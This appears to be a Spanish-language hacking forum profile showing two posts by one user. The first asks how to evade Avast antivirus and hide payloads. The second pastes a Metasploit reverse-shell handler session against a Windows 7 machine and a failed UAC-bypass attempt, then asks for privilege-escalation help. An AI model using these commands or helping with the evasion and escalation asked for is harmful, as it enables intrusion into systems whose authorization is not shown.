Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - RxB2019

#1
Alguna sugerencia pra bypassear AVAST AV? Probé con veil, phantom evasion y varios otros pero ninguna funciona.
Algún tutorial para aprender a ocultar payloads sin ser detectado?
#2
Buenas noches,

Estoy trabado y no se como solucionarlo. Obtuve una shell de windows (windows7 SP1) pero la misma no tiene privilegios de administrador y por lo tanto no puedo hacer demasiado, no me funciona ni el comando ftp. . El payload que utilicé es el siguiente:

msf5 exploit(multi/handler) > set PAYLOAD windows/x64/shell_reverse_tcp.

No utilicé meterpreter ya que me lo detecta el antivirus.

Muestro el resultado de la shell:

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/x64/shell_reverse_tcp
PAYLOAD => windows/x64/shell_reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.1.9
LHOST => 192.168.1.9
msf5 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf5 exploit(multi/handler) > run

  • Started reverse TCP handler on 192.168.1.9:8080
  • Command shell session 1 opened (192.168.1.9:8080 -> 192.168.1.4:49179) at 2019-04-05 23:06:51 -0400

    Microsoft Windows [Versi?n 6.1.7601]
    Copyright (c) 2009 Microsoft Corporation. Reservados todos los derechos.

    C:\Windows>

    Alguna sugerencia para esclarar privilegios?
    Probé con múltiples exploit pero en todos dice que la sesión podría no ser compatible:

    msf5 exploit(windows/local/bypassuac) > exploit -j
  • Exploit running as background job 0.
  • Exploit completed, but no session was created.

    [!] SESSION may not be compatible with this module.

    Alguien puede orientarme? Gracias!!!!